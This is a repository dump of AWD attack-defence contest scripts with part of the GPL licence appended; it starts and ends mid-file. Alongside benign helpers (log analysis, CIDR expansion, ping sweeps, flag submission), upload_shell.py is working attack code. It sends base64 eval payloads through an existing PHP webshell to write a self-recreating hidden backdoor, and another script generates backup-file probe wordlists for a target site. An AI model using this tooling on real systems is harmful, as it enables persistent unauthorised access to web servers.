  • ',b) 28 | 29 | ipaddrs = str(response[0][5:])+','+str(response[1][6:])+','+str(response[2][6:-5]) 30 | 31 | return ipaddrs 32 | 33 | 34 | def find_ipaddrs(ip): 35 | 36 | 37 | 38 | html = url_open(ip) 39 | 40 | ipaddrs = find_ip(html) 41 | 42 | 43 | print(ip+' : '+ipaddrs) 44 | -------------------------------------------------------------------------------- /AWD-Script/Python/main.py: -------------------------------------------------------------------------------- 1 | import re 2 | import os 3 | import sys 4 | from datetime import datetime 5 | import url 6 | import attack 7 | import ipfind 8 | 9 | 10 | 11 | 12 | needlist = url.needlist 13 | 14 | sqllist,xsslist,senlist = [],[],[] 15 | 16 | otherurl,iplist = [],[] 17 | 18 | 19 | [xssip,sqlip,senip,sqllist,xsslist,senlist,otherurl]=attack.find_attack(needlist) 20 | 21 | xssip = list(set(xssip)) 22 | 23 | sqlip = list(set(sqlip)) 24 | 25 | senip = list(set(senip)) 26 | 27 | print('>>>>>>>检测出xss攻击'+str(len(xsslist))+'次'+'共计'+str(len(xssip))+'个ip') 28 | print(xssip) 29 | print('>>>>>>>检测出sql攻击'+str(len(sqllist))+'次'+'共计'+str(len(sqlip))+'个ip') 30 | print(sqlip) 31 | print('>>>>>>>检测出敏感目录扫描'+str(len(senlist))+'次'+'共计'+str(len(senip))+'个ip') 32 | print(senip) 33 | 34 | iplist = list(set(xssip+sqlip+senip)) 35 | print(len(iplist)) 36 | 37 | print('开始分析ip地理位置') 38 | for i in iplist: 39 | 40 | ipfind.find_ipaddrs(str(i)) -------------------------------------------------------------------------------- /AWD-Script/Python/upload_shell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #coding=utf-8 3 | 4 | import sys,requests,base64 5 | 6 | ''' 7 | Usage: 8 | 将所需要传shell的url放在webshell.txt中,格式如下: 9 | url(含http:// or https://),method(请求方式),passwd 10 | http://127.0.0.1:80/1110/x.php,post,x 11 | http://127.0.0.2/1110/x.php,post,x 12 | http://127.0.0.3/1110/x.php,post,x 13 | 14 | tips: 别在","前后放空格。 15 | ''' 16 | #获取靶机的绝对路径 17 | def getpath(url,method,passwd): 18 | data = 
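{}
    # z0 is base64 for:  echo $_SERVER['SCRIPT_FILENAME'];
    # i.e. the existing shell is asked to print its own absolute path on disk.
    if method == "get":
        data[passwd] = '@eval(base64_decode($_GET[z0]));'
        data['z0'] = 'ZWNobyAkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ107'
        res = requests.get(url, params=data)
        return res.content.strip()
    elif method == "post":
        data[passwd] = '@eval(base64_decode($_POST[z0]));'
        data['z0'] = 'ZWNobyAkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ107'
        res = requests.post(url, data=data)
        return res.content.strip()
    else:
        return 0


def loadfile(filepath):
    """Read *filepath* in binary mode and return its contents as a str.

    Exits the process when the file cannot be opened (the original
    behaviour callers rely on: no exception propagates).  The handle is
    closed by the ``with`` block; the original leaked it.
    """
    try:
        with open(filepath, "rb") as fh:
            return str(fh.read())
    except IOError:
        print "File %s Not Found!" % filepath
        sys.exit()


# Base64 of the Caidao-style "write file" stub, one variant per superglobal.
# Decoded, the POST variant reads (the GET one only swaps $_POST for $_GET):
#   @ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;
#   $f=base64_decode($_POST["z1"]);
#   $c=base64_decode($_POST["z2"]);
#   $c=str_replace("\r","",$c);
#   $c=str_replace("\n","",$c);
#   $buf=""; for($i=0;$i<strlen($c);$i+=1) $buf.=substr($c,$i,1);
#   echo(@fwrite(fopen($f,"w"),$buf));
#   echo("|<-");
#   die();
# z1 = destination path, z2 = file body.  NOTE: every CR and LF in z2 is
# stripped before the write, so ./shell.php must not depend on line breaks
# (a `//` or `#` comment would swallow the rest of the file).
WRITE_STUB = {
    "post": 'QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzsKJGY9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoxIl0pOwokYz1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejIiXSk7CiRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOwokYz1zdHJfcmVwbGFjZSgiXG4iLCIiLCRjKTsKJGJ1Zj0iIjsKZm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MSkKICAgICRidWYuPXN1YnN0cigkYywkaSwxKTsKZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1ZikpOwplY2hvKCJ8PC0iKTsKZGllKCk7',
    "get": 'QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzsKJGY9YmFzZTY0X2RlY29kZSgkX0dFVFsiejEiXSk7CiRjPWJhc2U2NF9kZWNvZGUoJF9HRVRbInoyIl0pOwokYz1zdHJfcmVwbGFjZSgiXHIiLCIiLCRjKTsKJGM9c3RyX3JlcGxhY2UoIlxuIiwiIiwkYyk7CiRidWY9IiI7CmZvcigkaT0wOyRpPHN0cmxlbigkYyk7JGkrPTEpCiAgICAkYnVmLj1zdWJzdHIoJGMsJGksMSk7CmVjaG8oQGZ3cml0ZShmb3BlbigkZiwidyIpLCRidWYpKTsKZWNobygifDwtIik7CmRpZSgpOw==',
}


def upload(url, method, passwd):
    """Drop the persistent backdoor next to an existing one-line PHP shell.

    url    -- full URL of the existing shell, e.g. http://127.0.0.1:80/1110/x.php
              (scheme required; a port, if any, stays in the host part)
    method -- "get" or "post": the superglobal the shell eval()s from
    passwd -- the shell's parameter name (its "password")

    Flow: confirm the shell answers -> ask it for its absolute path ->
    write ./shell.php beside it as fuck.php through WRITE_STUB -> request
    fuck.php once so it creates .index.php -> confirm .index.php answers.
    Prints progress; returns 0 on any failure, None on success (callers
    only look at the printed result).

    AWD tooling: only point this at hosts you are authorised to attack.
    """
    try:
        from urlparse import urlparse          # Python 2
    except ImportError:
        from urllib.parse import urlparse      # Python 3

    # 1. Split the URL.  The original sliced 7 or 8 characters off blindly
    #    and mis-routed https:// URLs (they still contain "http"), so parse.
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.netloc:
        print "[-] %s is not an http(s) URL!" % url
        return 0
    scheme = parsed.scheme
    ip = parsed.netloc                         # host[:port], e.g. 127.0.0.1:80
    Rfile = parsed.path                        # e.g. /1110/x.php

    # 2. Is the shell reachable at all?
    try:
        res = requests.get(url, timeout=10)
    except requests.exceptions.RequestException:
        print "[-] %s ERR_CONNECTION_TIMED_OUT" % url
        return 0
    if res.status_code != 200:
        print "[-] %s Page Not Found!" % url
        return 0

    # 3. What to write, and where.
    shell_content = loadfile("./shell.php")
    Rpath = getpath(url, method, passwd)       # e.g. D:/phpStudy/WWW/1110/x.php
    if not Rpath or "/" not in Rpath:
        # getpath() returns 0 for a bad method and "" when the shell printed
        # nothing; without a "/" there is no directory to build on (the
        # original crashed on .split here).  If the shell wraps its output
        # in HTML, Rpath is garbage and the write lands in the wrong place.
        print "[-] %s could not resolve the shell's directory!" % url
        return 0
    # Directory of the shell, trailing slash kept.  Assumes forward slashes,
    # as in the sample path above; a Windows path using "\" would not split.
    remote_dir = Rpath.rsplit("/", 1)[0] + "/"

    if method not in WRITE_STUB:
        print "method err!"
        sys.exit()
    data = {}
    data[passwd] = "@eval(base64_decode($_%s['z0']));" % method.upper()
    data['z0'] = WRITE_STUB[method]
    data['z1'] = base64.b64encode(remote_dir + "fuck.php")
    data['z2'] = base64.b64encode(shell_content)
    try:
        if method == "post":
            res = requests.post(url, data=data, timeout=10)
        else:
            # The GET stub reads $_GET, so the payload rides in the query
            # string (as the original did); a large shell.php can exceed the
            # server's URL length limit -- prefer the post variant.
            res = requests.post(url, params=data, timeout=10)
    except requests.exceptions.RequestException:
        print "[-] %s upload failed!" % ip
        return 0
    # The stub brackets fwrite()'s return value with ->| and |<-.  No marker
    # at all means the eval never ran (wrong passwd/method); an empty middle
    # means fwrite() returned false (e.g. directory not writable).  The
    # original only looked at the status code and reported both as success.
    if res.status_code != 200 or "->|" not in res.content or "->||<-" in res.content:
        print "[-] %s upload failed!" % ip
        return 0

    # 4. Trigger fuck.php once.  Presumably it loops forever re-creating
    #    .index.php (the 不死马 pattern), so this request is expected to hit
    #    the timeout -- that is why the error is deliberately ignored.
    base_url = "%s://%s%s" % (scheme, ip, Rfile.rsplit("/", 1)[0])
    bsm_url = base_url + "/fuck.php"
    try:
        requests.get(bsm_url, timeout=3)
    except requests.exceptions.RequestException:
        pass

    # 5. Did .index.php appear?  (The original hard-coded http:// here and
    #    had no timeout on this request.)
    shell_url = base_url + "/.index.php"
    try:
        res = requests.get(shell_url, timeout=10)
    except requests.exceptions.RequestException:
        print "[-] %s create shell failed!" % bsm_url
        return 0
    if res.status_code != 200:
        print "[-] %s create shell failed!" % bsm_url
        return 0
    print "[+] %s upload sucessed!" % shell_url


if __name__ == '__main__':
    # webshell.txt: one "url,method,passwd" per line.  splitlines() accepts
    # LF as well as CRLF (the original split on "\r\n" only, so a file saved
    # on Linux was treated as a single line).
    shellstr = loadfile("./webshell.txt")
    targets = []
    for line in shellstr.splitlines():
        line = line.strip()
        if not line:
            continue
        fields = [f.strip() for f in line.split(",")]
        if len(fields) < 3:
            print "[-] %s malformed line (expected url,method,passwd)!" % line
            continue
        target_url, method_tmp, passwd_tmp = fields[0], fields[1].lower(), fields[2]
        if method_tmp not in ('get', 'post'):
            print "[-] %s request method error!" % target_url
            continue
        targets.append((target_url, method_tmp, passwd_tmp))
    for target_url, method_tmp, passwd_tmp in targets:
        upload(url=target_url, method=method_tmp, passwd=passwd_tmp)

--------------------------------------------------------------------------------
/AWD-Script/Python/url.py:
--------------------------------------------------------------------------------
import re
import os
import sys
from collections import Counter
from datetime import datetime


dt = datetime.now()
date = str(dt.date())            # stamps the output file names

loglist = []                     # unused; kept for compatibility
iplist = []                      # client IP of every parsed line
urllist = []                     # URL of every parsed line
needlist = []                    # selected fields of every parsed line
errorlist = []                   # lines with too few fields
ipdict, urldict = {}, {}


rizhi = str(input('请输入要分析的日志文件名'))


def find_log():
    """Parse the log named in *rizhi* into iplist / urllist / needlist.

    Lines starting with '#' are skipped.  Fields are split on single
    spaces; field 10 is taken as the client IP and field 6 as the URL --
    the column layout the original author assumed.  NOTE(review): check it
    against the "#Fields:" header of your own log format.  A line that is
    too short lands in errorlist instead of raising IndexError (the
    original only guarded the needlist append, so a short line crashed
    on the iplist append just before it).
    """
    print('>>>>>>>开始解析日志')
    with open(rizhi, 'r', encoding='UTF-8', errors='ignore') as f:
        for line in f:
            if line.startswith('#'):
                continue
            fields = line.rstrip('\n').split(' ')
            if len(fields) <= 10:
                errorlist.append(line)
                continue
            iplist.append(fields[10])
            urllist.append(fields[6])
            try:
                needlist.append([fields[10], fields[1], fields[5], fields[6], fields[15]])
            except IndexError:
                errorlist.append(line)
    print('>>>>>>>日志解析完毕')


def count(iplist, urllist):
    """Return [ip_hits, url_hits]: (value, hits) pairs sorted by hits, descending.

    Counter.most_common() replaces the original O(n^2) list.count() loop
    and the debug print of the result type.
    """
    print('>>>>>>>开始分析url与ip访问量')
    ip_hits = Counter(iplist).most_common()
    url_hits = Counter(urllist).most_common()
    print('>>>>>url与ip分析完毕.......')
    return [ip_hits, url_hits]


def save_count():
    """Write iplist / urllist (as returned by count()) to ip-DATE.txt / url-DATE.txt.

    Written as UTF-8 to match the encoding the log was read with; the
    original used the locale default and could fail on non-ASCII URLs.
    """
    print('>>>>>>>正在保存分析结果')
    ipname = 'ip-' + date + '.txt'
    urlname = 'url-' + date + '.txt'
    with open(ipname, 'w', encoding='UTF-8') as f:
        for entry in iplist:
            f.write(str(list(entry)) + '\n')
    with open(urlname, 'w', encoding='UTF-8') as f:
        for entry in urllist:
            f.write(str(list(entry)) + '\n')
    print('>>>>>>>分析结果保存完毕')


find_log()
[iplist, urllist] = count(iplist, urllist)
save_count()

--------------------------------------------------------------------------------
/AWD-Script/Python/处理B段.py:
--------------------------------------------------------------------------------
import ipaddress

# Expand a CIDR block into one host address per line in ip_addresses.txt.
cidr_input = input("请输入CIDR表示的子网地址(例如,10.219.1.1/16): ")

try:
    # strict=False masks the host bits: 10.219.1.1/16 -> 10.219.0.0/16.
    network = ipaddress.IPv4Network(cidr_input, strict=False)
except ValueError as e:
    # AddressValueError and NetmaskValueError are both ValueError subclasses,
    # so one clause covers what the original spelled out twice.
    print("无效的CIDR表示:", e)
else:
    # hosts() excludes network and broadcast; a /16 yields 65534 lines.
    ip_list = [str(ip) for ip in network.hosts()]

    filename = "ip_addresses.txt"
    with open(filename, 'w') as file:
        file.write("\n".join(ip_list))

    # The original f-string had no placeholder and printed a literal
    # "(unknown)" instead of the file name.
    print(f"已将IP地址保存到 {filename} 文件中。")

--------------------------------------------------------------------------------
/AWD-Script/Python/提交flag.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python2
import sys
import json
import urllib
import httplib
server_host = ' '   # 提交flag的服务器地址 -- fill in before use
server_port = 80


def submit(team_token, flag, host=server_host, port=server_port, timeout=5):
    """POST token and flag to the scoring server and return its decoded JSON reply.

    Raises Exception when either value is empty and ValueError when the
    reply is not JSON (the HTTP status and a reply excerpt are included
    so a wrong path or host is diagnosable).  The request goes over plain
    HTTP, so the team token travels in cleartext -- use only on the
    contest network.
    """
    if not team_token or not flag:
        raise Exception('team token or flag wrong')
    conn = httplib.HTTPConnection(host, port, timeout=timeout)
    params = urllib.urlencode({  # 提交需要post的参数,根据情况修改
        'token': team_token,
        'flag': flag,
    })
    # Fixed: the original sent "x-www-form-urlencode" (missing the final
    # 'd'), which a strict server will not parse as a form body.
    headers = {
        "Content-type": "application/x-www-form-urlencoded"
    }
    try:
        conn.request('POST', '[submit_flag_dir]', params, headers)  # 第二个参数为提交flag的目录
        response = conn.getresponse()
        data = response.read()
    finally:
        conn.close()
    try:
        return json.loads(data)
    except ValueError:
        raise ValueError('non-JSON reply (HTTP %d): %r' % (response.status, data[:200]))


if __name__ == '__main__':
    if len(sys.argv) < 3:
        print 'usage: ./submitflag.py [team_token] [flag]'
        sys.exit()
    host = server_host
    if len(sys.argv) > 3:
        host = sys.argv[3]
    print json.dumps(submit(sys.argv[1], sys.argv[2], host=host), indent=4)

--------------------------------------------------------------------------------
/AWD-Script/Python/根据URL生成字典.py:
--------------------------------------------------------------------------------
#coding=utf-8

# 根据URL生成特定目标网站备份文件猜测字典
# Build a wordlist of likely backup/config file names for one target host
# and write it to success.txt, one "/name.ext" per line.

suffixList = ['.rar','.zip','.sql','.gz','.tar','.bz2','.tar.gz','.bak','.dat','.mdb','.env','.config','.md','.js','.json','.ini','.inf','.py','.txt','.doc','.docx','.xml','.swp','.yaml','.yml','.log','.conf','.ssh','.lock','.sqlite','.sqlite3','.info']

keyList=['install','admin','sa','back','backup','说明','install','INSTALL','index','INDEX','wwwroot','WWWROOT','www','WWW','root','ROOT','web','WEB','备份','新建文件夹','config','readme','setup','SETUP']

# 请输入目标URL

print "Please input the url:"
url = raw_input().strip()

# Drop the scheme.
if url[:5] == 'http:':
    url = url[7:].strip()
elif url[:6] == 'https:':
    url = url[8:].strip()

# Keep only the host part.  Fixed: the original did `url - url[:numT]`,
# which raises TypeError for any URL that contains a path.
numT = url.find('/')
if numT != -1:
    url = url[:numT]

# 根据URL,推测一些针对性的文件名:
# For www.test.com the "brand" label is test; for test.com it is test as
# well.  The original sliced between the first two dots and produced a
# truncated label ("co") for two-label hosts.
labels = url.split('.')
if url:
    brand = labels[1] if len(labels) >= 3 else labels[0]
    keyList.append(brand)
    keyList.append(brand.upper())

    keyList.append(url)                                      # www.test.com
    keyList.append(url.upper())

    keyList.append(url.replace('.', '_'))                    # www_test_com
    keyList.append(url.replace('.', '_').upper())

    keyList.append(url.replace('.', ''))                     # wwwtestcom
    keyList.append(url.replace('.', '').upper())

    if len(labels) >= 2:
        domain = '.'.join(labels[1:])                        # test.com
        keyList.append(domain)
        keyList.append(domain.upper())
        keyList.append(domain.replace('.', '_'))             # test_com
        keyList.append(domain.replace('.', '_').upper())

# 生成字典列表,并写入txt文件:
# Deduplicate while keeping order ('install' appears twice above, and the
# derived names often repeat a static key).
seen = set()
names = []
for key in keyList:
    if key not in seen:
        seen.add(key)
        names.append(key)

with open("success.txt", 'w') as fobj:
    for key in names:
        for suff in suffixList:
            fobj.write('/%s%s\n' % (key, suff))

print 'OK!'

--------------------------------------------------------------------------------
/AWD-Script/Python/靶机ping扫描.py:
--------------------------------------------------------------------------------
import platform
import sys
import os
import time
import subprocess
from multiprocessing import Pool
from multiprocessing.dummy import Pool as ThreadPool

iplist = []


def get_os():
    """Return the ping count flag letter: 'n' on Windows, 'c' elsewhere."""
    system_name = platform.system()
    if system_name == "Windows":
        return "n"
    return "c"


def ping_ip(ip_str):
    """Ping *ip_str* once and print it when the reply mentions TTL.

    The command is run as an argument list without a shell.  The original
    used os.popen(" ".join(cmd)), so a crafted argv value such as
    "1.2.3.4; rm -rf /" would have been executed by the shell.
    """
    cmd = ["ping", "-" + get_os(), "1", ip_str]
    try:
        proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
        output, _ = proc.communicate()
    except OSError:             # no ping binary
        return
    # str() keeps this working whether communicate() returns str or bytes.
    if "TTL" in str(output).upper():
        print "ip: %s is ok ***" % ip_str


def find_ip(ip_prefix):
    """Append ip_prefix.1 ... ip_prefix.255 to the module-level iplist."""
    for host in range(1, 256):
        iplist.append('%s.%s' % (ip_prefix, host))


if __name__ == "__main__":
    start_time = time.time()
    args = "".join(sys.argv[1:])

    # Accept only "a.b.c.x"-style input: three numeric octets before the
    # host byte we iterate over.  Anything else is rejected up front rather
    # than handed to ping.
    octets = args.split('.')[:-1]
    if len(octets) != 3 or not all(o.isdigit() and int(o) < 256 for o in octets):
        print "usage: %s <a.b.c.0>" % sys.argv[0]
        sys.exit(1)
    ip_prefix = '.'.join(octets)
    find_ip(ip_prefix)
    #pool = ThreadPool(50)
    pool = Pool(50)
    pool.map(ping_ip, iplist)
    pool.close()
    pool.join()
    print time.time() - start_time

--------------------------------------------------------------------------------
/AWD-Script/Readme.md:
--------------------------------------------------------------------------------
本目录存放AWD比赛所需的脚本
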
脚本主要来源于开源项目:[https://github.com/admintony/Prepare-for-AWD](https://github.com/admintony/Prepare-for-AWD) 4 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 3, 29 June 2007 3 | 4 | Copyright (C) 2007 Free Software Foundation, Inc. 5 | Everyone is permitted to copy and distribute verbatim copies 6 | of this license document, but changing it is not allowed. 7 | 8 | Preamble 9 | 10 | The GNU General Public License is a free, copyleft license for 11 | software and other kinds of works. 12 | 13 | The licenses for most software and other practical works are designed 14 | to take away your freedom to share and change the works. By contrast, 15 | the GNU General Public License is intended to guarantee your freedom to 16 | share and change all versions of a program--to make sure it remains free 17 | software for all its users. We, the Free Software Foundation, use the 18 | GNU General Public License for most of our software; it applies also to 19 | any other work released this way by its authors. You can apply it to 20 | your programs, too. 21 | 22 | When we speak of free software, we are referring to freedom, not 23 | price. Our General Public Licenses are designed to make sure that you 24 | have the freedom to distribute copies of free software (and charge for 25 | them if you wish), that you receive source code or can get it if you 26 | want it, that you can change the software or use pieces of it in new 27 | free programs, and that you know you can do these things. 28 | 29 | To protect your rights, we need to prevent others from denying you 30 | these rights or asking you to surrender the rights. Therefore, you have 31 | certain responsibilities if you distribute copies of the software, or if 32 | you modify it: responsibilities to respect the freedom of others. 
33 | 34 | For example, if you distribute copies of such a program, whether 35 | gratis or for a fee, you must pass on to the recipients the same 36 | freedoms that you received. You must make sure that they, too, receive 37 | or can get the source code. And you must show them these terms so they 38 | know their rights. 39 | 40 | Developers that use the GNU GPL protect your rights with two steps: 41 | (1) assert copyright on the software, and (2) offer you this License 42 | giving you legal permission to copy, distribute and/or modify it. 43 | 44 | For the developers' and authors' protection, the GPL clearly explains 45 | that there is no warranty for this free software. For both users' and 46 | authors' sake, the GPL requires that modified versions be marked as 47 | changed, so that their problems will not be attributed erroneously to 48 | authors of previous versions. 49 | 50 | Some devices are designed to deny users access to install or run 51 | modified versions of the software inside them, although the manufacturer 52 | can do so. This is fundamentally incompatible with the aim of 53 | protecting users' freedom to change the software. The systematic 54 | pattern of such abuse occurs in the area of products for individuals to 55 | use, which is precisely where it is most unacceptable. Therefore, we 56 | have designed this version of the GPL to prohibit the practice for those 57 | products. If such problems arise substantially in other domains, we 58 | stand ready to extend this provision to those domains in future versions 59 | of the GPL, as needed to protect the freedom of users. 60 | 61 | Finally, every program is threatened constantly by software patents. 62 | States should not allow patents to restrict development and use of 63 | software on general-purpose computers, but in those that do, we wish to 64 | avoid the special danger that patents applied to a free program could 65 | make it effectively proprietary. 
To prevent this, the GPL assures that 66 | patents cannot be used to render the program non-free. 67 | 68 | The precise terms and conditions for copying, distribution and 69 | modification follow. 70 | 71 | TERMS AND CONDITIONS 72 | 73 | 0. Definitions. 74 | 75 | "This License" refers to version 3 of the GNU General Public License. 76 | 77 | "Copyright" also means copyright-like laws that apply to other kinds of 78 | works, such as semiconductor masks. 79 | 80 | "The Program" refers to any copyrightable work licensed under this 81 | License. Each licensee is addressed as "you". "Licensees" and 82 | "recipients" may be individuals or organizations. 83 | 84 | To "modify" a work means to copy from or adapt all or part of the work 85 | in a fashion requiring copyright permission, other than the making of an 86 | exact copy. The resulting work is called a "modified version" of the 87 | earlier work or a work "based on" the earlier work. 88 | 89 | A "covered work" means either the unmodified Program or a work based 90 | on the Program. 91 | 92 | To "propagate" a work means to do anything with it that, without 93 | permission, would make you directly or secondarily liable for 94 | infringement under applicable copyright law, except executing it on a 95 | computer or modifying a private copy. Propagation includes copying, 96 | distribution (with or without modification), making available to the 97 | public, and in some countries other activities as well. 98 | 99 | To "convey" a work means any kind of propagation that enables other 100 | parties to make or receive copies. Mere interaction with a user through 101 | a computer network, with no transfer of a copy, is not conveying. 
102 | 103 | An interactive user interface displays "Appropriate Legal Notices" 104 | to the extent that it includes a convenient and prominently visible 105 | feature that (1) displays an appropriate copyright notice, and (2) 106 | tells the user that there is no warranty for the work (except to the 107 | extent that warranties are provided), that licensees may convey the 108 | work under this License, and how to view a copy of this License. If 109 | the interface presents a list of user commands or options, such as a 110 | menu, a prominent item in the list meets this criterion. 111 | 112 | 1. Source Code. 113 | 114 | The "source code" for a work means the preferred form of the work 115 | for making modifications to it. "Object code" means any non-source 116 | form of a work. 117 | 118 | A "Standard Interface" means an interface that either is an official 119 | standard defined by a recognized standards body, or, in the case of 120 | interfaces specified for a particular programming language, one that 121 | is widely used among developers working in that language. 122 | 123 | The "System Libraries" of an executable work include anything, other 124 | than the work as a whole, that (a) is included in the normal form of 125 | packaging a Major Component, but which is not part of that Major 126 | Component, and (b) serves only to enable use of the work with that 127 | Major Component, or to implement a Standard Interface for which an 128 | implementation is available to the public in source code form. A 129 | "Major Component", in this context, means a major essential component 130 | (kernel, window system, and so on) of the specific operating system 131 | (if any) on which the executable work runs, or a compiler used to 132 | produce the work, or an object code interpreter used to run it. 
133 | 134 | The "Corresponding Source" for a work in object code form means all 135 | the source code needed to generate, install, and (for an executable 136 | work) run the object code and to modify the work, including scripts to 137 | control those activities. However, it does not include the work's 138 | System Libraries, or general-purpose tools or generally available free 139 | programs which are used unmodified in performing those activities but 140 | which are not part of the work. For example, Corresponding Source 141 | includes interface definition files associated with source files for 142 | the work, and the source code for shared libraries and dynamically 143 | linked subprograms that the work is specifically designed to require, 144 | such as by intimate data communication or control flow between those 145 | subprograms and other parts of the work. 146 | 147 | The Corresponding Source need not include anything that users 148 | can regenerate automatically from other parts of the Corresponding 149 | Source. 150 | 151 | The Corresponding Source for a work in source code form is that 152 | same work. 153 | 154 | 2. Basic Permissions. 155 | 156 | All rights granted under this License are granted for the term of 157 | copyright on the Program, and are irrevocable provided the stated 158 | conditions are met. This License explicitly affirms your unlimited 159 | permission to run the unmodified Program. The output from running a 160 | covered work is covered by this License only if the output, given its 161 | content, constitutes a covered work. This License acknowledges your 162 | rights of fair use or other equivalent, as provided by copyright law. 163 | 164 | You may make, run and propagate covered works that you do not 165 | convey, without conditions so long as your license otherwise remains 166 | in force. 
You may convey covered works to others for the sole purpose 167 | of having them make modifications exclusively for you, or provide you 168 | with facilities for running those works, provided that you comply with 169 | the terms of this License in conveying all material for which you do 170 | not control copyright. Those thus making or running the covered works 171 | for you must do so exclusively on your behalf, under your direction 172 | and control, on terms that prohibit them from making any copies of 173 | your copyrighted material outside their relationship with you. 174 | 175 | Conveying under any other circumstances is permitted solely under 176 | the conditions stated below. Sublicensing is not allowed; section 10 177 | makes it unnecessary. 178 | 179 | 3. Protecting Users' Legal Rights From Anti-Circumvention Law. 180 | 181 | No covered work shall be deemed part of an effective technological 182 | measure under any applicable law fulfilling obligations under article 183 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or 184 | similar laws prohibiting or restricting circumvention of such 185 | measures. 186 | 187 | When you convey a covered work, you waive any legal power to forbid 188 | circumvention of technological measures to the extent such circumvention 189 | is effected by exercising rights under this License with respect to 190 | the covered work, and you disclaim any intention to limit operation or 191 | modification of the work as a means of enforcing, against the work's 192 | users, your or third parties' legal rights to forbid circumvention of 193 | technological measures. 194 | 195 | 4. Conveying Verbatim Copies. 
196 | 197 | You may convey verbatim copies of the Program's source code as you 198 | receive it, in any medium, provided that you conspicuously and 199 | appropriately publish on each copy an appropriate copyright notice; 200 | keep intact all notices stating that this License and any 201 | non-permissive terms added in accord with section 7 apply to the code; 202 | keep intact all notices of the absence of any warranty; and give all 203 | recipients a copy of this License along with the Program. 204 | 205 | You may charge any price or no price for each copy that you convey, 206 | and you may offer support or warranty protection for a fee. 207 | 208 | 5. Conveying Modified Source Versions. 209 | 210 | You may convey a work based on the Program, or the modifications to 211 | produce it from the Program, in the form of source code under the 212 | terms of section 4, provided that you also meet all of these conditions: 213 | 214 | a) The work must carry prominent notices stating that you modified 215 | it, and giving a relevant date. 216 | 217 | b) The work must carry prominent notices stating that it is 218 | released under this License and any conditions added under section 219 | 7. This requirement modifies the requirement in section 4 to 220 | "keep intact all notices". 221 | 222 | c) You must license the entire work, as a whole, under this 223 | License to anyone who comes into possession of a copy. This 224 | License will therefore apply, along with any applicable section 7 225 | additional terms, to the whole of the work, and all its parts, 226 | regardless of how they are packaged. This License gives no 227 | permission to license the work in any other way, but it does not 228 | invalidate such permission if you have separately received it. 
229 | 230 | d) If the work has interactive user interfaces, each must display 231 | Appropriate Legal Notices; however, if the Program has interactive 232 | interfaces that do not display Appropriate Legal Notices, your 233 | work need not make them do so. 234 | 235 | A compilation of a covered work with other separate and independent 236 | works, which are not by their nature extensions of the covered work, 237 | and which are not combined with it such as to form a larger program, 238 | in or on a volume of a storage or distribution medium, is called an 239 | "aggregate" if the compilation and its resulting copyright are not 240 | used to limit the access or legal rights of the compilation's users 241 | beyond what the individual works permit. Inclusion of a covered work 242 | in an aggregate does not cause this License to apply to the other 243 | parts of the aggregate. 244 | 245 | 6. Conveying Non-Source Forms. 246 | 247 | You may convey a covered work in object code form under the terms 248 | of sections 4 and 5, provided that you also convey the 249 | machine-readable Corresponding Source under the terms of this License, 250 | in one of these ways: 251 | 252 | a) Convey the object code in, or embodied in, a physical product 253 | (including a physical distribution medium), accompanied by the 254 | Corresponding Source fixed on a durable physical medium 255 | customarily used for software interchange. 
256 | 257 | b) Convey the object code in, or embodied in, a physical product 258 | (including a physical distribution medium), accompanied by a 259 | written offer, valid for at least three years and valid for as 260 | long as you offer spare parts or customer support for that product 261 | model, to give anyone who possesses the object code either (1) a 262 | copy of the Corresponding Source for all the software in the 263 | product that is covered by this License, on a durable physical 264 | medium customarily used for software interchange, for a price no 265 | more than your reasonable cost of physically performing this 266 | conveying of source, or (2) access to copy the 267 | Corresponding Source from a network server at no charge. 268 | 269 | c) Convey individual copies of the object code with a copy of the 270 | written offer to provide the Corresponding Source. This 271 | alternative is allowed only occasionally and noncommercially, and 272 | only if you received the object code with such an offer, in accord 273 | with subsection 6b. 274 | 275 | d) Convey the object code by offering access from a designated 276 | place (gratis or for a charge), and offer equivalent access to the 277 | Corresponding Source in the same way through the same place at no 278 | further charge. You need not require recipients to copy the 279 | Corresponding Source along with the object code. If the place to 280 | copy the object code is a network server, the Corresponding Source 281 | may be on a different server (operated by you or a third party) 282 | that supports equivalent copying facilities, provided you maintain 283 | clear directions next to the object code saying where to find the 284 | Corresponding Source. Regardless of what server hosts the 285 | Corresponding Source, you remain obligated to ensure that it is 286 | available for as long as needed to satisfy these requirements. 
287 | 288 | e) Convey the object code using peer-to-peer transmission, provided 289 | you inform other peers where the object code and Corresponding 290 | Source of the work are being offered to the general public at no 291 | charge under subsection 6d. 292 | 293 | A separable portion of the object code, whose source code is excluded 294 | from the Corresponding Source as a System Library, need not be 295 | included in conveying the object code work. 296 | 297 | A "User Product" is either (1) a "consumer product", which means any 298 | tangible personal property which is normally used for personal, family, 299 | or household purposes, or (2) anything designed or sold for incorporation 300 | into a dwelling. In determining whether a product is a consumer product, 301 | doubtful cases shall be resolved in favor of coverage. For a particular 302 | product received by a particular user, "normally used" refers to a 303 | typical or common use of that class of product, regardless of the status 304 | of the particular user or of the way in which the particular user 305 | actually uses, or expects or is expected to use, the product. A product 306 | is a consumer product regardless of whether the product has substantial 307 | commercial, industrial or non-consumer uses, unless such uses represent 308 | the only significant mode of use of the product. 309 | 310 | "Installation Information" for a User Product means any methods, 311 | 